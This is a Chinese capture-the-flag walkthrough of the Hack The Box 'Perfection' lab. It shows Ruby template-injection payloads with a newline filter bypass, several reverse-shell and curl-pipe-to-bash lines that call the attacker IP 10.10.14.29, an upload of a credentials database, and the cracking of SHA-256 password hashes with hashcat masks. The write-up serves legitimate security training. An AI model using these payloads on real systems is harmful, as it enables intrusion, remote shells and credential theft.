端口 打开了ssh和http服务
访问 Perfection靶机的网站
是一个根据权重计算总成绩的网站
Wappalyzer查看网页用的什么编写搭建的
抓包看一下是怎么工作的
发送,,返回的结果
如果我在 类别 后面多加一句命令
就会出现提示 恶意输入阻止
大概率有命令注入
通过插件知道用的ruby语言
存在SSTI(模板注入漏洞)
SSTI (Server Side Template Injection) | HackTricks | HackTricks
%0A是截断符号,它可以使bash在读取代码时读到这个符号时停止读取这一行的后续代码,取而代之的是接着执行后面的代码
在传参中url编码会自动忽略空格要用“+”来代替上述语句
将payload使用base64编码来进行嵌套,为了避免后面可能会有一些关键字过滤
url encode key characte编码
aaa%0A<%25%3d+File.open('/etc/passwd').read+%25>
把<%= File.open('/etc/passwd').read %> 选中右键选择Convert Selection选择url 选择url encode key character 就得到<%25%3d+File.open('/etc/passwd').read+%25>
有一个susan用户
拿shell第一次失败,再次重试就成功了
<%= `bash -c 'bash -i >& /dev/tcp/10.10.14.29/6666 0>&1'` %>
-c 运行后边的字符串命令
bash -i (交互式) 启动一个交互式bash shell
>& 将这个shell的标准输出和标准错误输出都重定向到 与IP地址10.10.14.29在端口6666上建立的TCP连接中
/dev/tcp打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据,/dev/tcp/host/port 只要读取或者写入这个文件,相当于系统会尝试连接:host 这台机器,对应port端口
0标准输入 重定向 >& 1标准输出
把它url encode key character 得到
<%25%3d+`bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.29/6666+0>%261'`+%25>
然后category1=
ingles%0A<%25%3d+`bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.29/6666+0>%261'`+%25>
拿到shell了
拿shell第二次失败
写个1.sh 内容为
bash -i >& /dev/tcp/10.10.14.29/6666 0>&1
开启http服务
python3 -m http.server 80
把<%= `curl http://10.10.14.29/1.sh|bash` %>编码
<%25%3d+`curl+http://10.10.14.29/1.sh|bash`+%25>
还是失败 状态码应该是504不是200
拿shell第三次失败
HTB靶机渗透之perfection(linux-easy)超详细!!!_webrick 1.7.0 漏洞-CSDN博客
在burp的 decoder模块编码
由于这个代码在输入网页后,发送到服务器前会被自动url编码,所以我们要对对应的字符手动进行url编码
%25对应的是%
aaa%0a<%25恶意代码%25>;
要让base64格式的payload能被正确在bash中读取,在linux系统中,我们可以通过echo来写入文件或是执行命令,然后调用base64 -d来解析payload,最后再用bash执行,“|”符号的作用就是分割语句
其余恶意代码=echo+[payload]|+base64+-d+|+bash (+表示空格)
总的 category1=
aaa%0a<%25=system("echo+payload|+base64+-d+|+bash);%25>;
写一段反弹shell代码#!/bin/bash bash -i >& /dev/tcp/10.10.14.29/6666 0>&1
经过base64编码
拿到用户的flag
现在就要提权了
.sudo_as_admin_successful 我们只有读写,不能执行
ssh密钥登录没必要尝试
接着看.ssh目录有2个文件(都可以读写) ssh是密钥登录
authorized.keys是密钥对中的公钥
authorized_keys用于存储允许通过 SSH 访问特定用户帐户的公钥。当用户尝试通过 SSH 连接到服务器时,服务器会使用此文件中的公钥验证用户的身份
查看/etc/ssh/sshd_config
PubkeyAuthentication yes表示允许密钥访问
susan服务器生成密钥对ssh-keygen
服务器安装公钥 cat id_rsa.pub >> authorized_keys
私钥./id_rsa拷贝到客户端
然后我觉得就算登录成功,ssh依然是susan的shell
换思路
sudo -l 列出当前用户可以执行的sudo命令 执行不了sudo需要密码
查找具有suid的权限
-type f 仅查找文件
有fusermount3 查看版本fusermount3 --version
fusermount3 version: 3.10.5
fusermount3没有漏洞可以利用
查找.txt、.db、.sql、.dump文件
寻找和password有关的文件 grep -i password -R
grep是文本搜索工具 -i不区分大小写 -R递归搜索,查找目录下的所有子目录
find / -name "*.db" -type f 2>/dev/nul
/home/susan/Migration/pupilpath_credentials.db是数据库文件
靶机上虽然有sqlite3 但是不会显示任何内容
试试 创造一个交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
成功显示交互内容
sqlite3 .db
.table
select * from users;
得到
1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
2|Tina Smith|dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
3|Harry Tyler|d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
4|David Lawrence|ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
5|Stephen Locke|154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8
没实验过
或者把db文件下载到自己的机器
开启http服务 curl上传文件到127.0.0.1
curl -F "file=@pupilpath_credentials.db" http://127.0.0.1
查看包含用户名的文件
find / -name "*susan*" -type f -ls 2>/dev/null
cat /var/mail/susan
所以说密码格式
susan(名)_nasus(名字反过来)_一串数字
hash-identifier hash码
可以判断hash加密的算法是啥 sha256
hashcat
参考HTB Perfection_perfection htb-CSDN博客
hashcat -m 1400 -a 3 -i --increment-min=1 --increment-max=10 hash.txt 'susan_nasus_?d?d?d?d?d?d?d?d?d?d'
-m 1400 描述了哈希类型(SHA256) 0是MD5
-a 3 使用掩码模式
-i 以及 --increment-min=1 和 --increment-max=10 指定你要爆破的最小和最大长度
?d?d?d?d?d?d?d?d?d?d 是一个掩码字符串,用于生成尝试的密码 ?d 表示一位数字
我的虚拟机内存不够
然后我就直接 看其他人的
susan_nasus_413759210
然后ssh登录 ssh susan@10.10.11.253
sudo -i 就可以了
2082
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
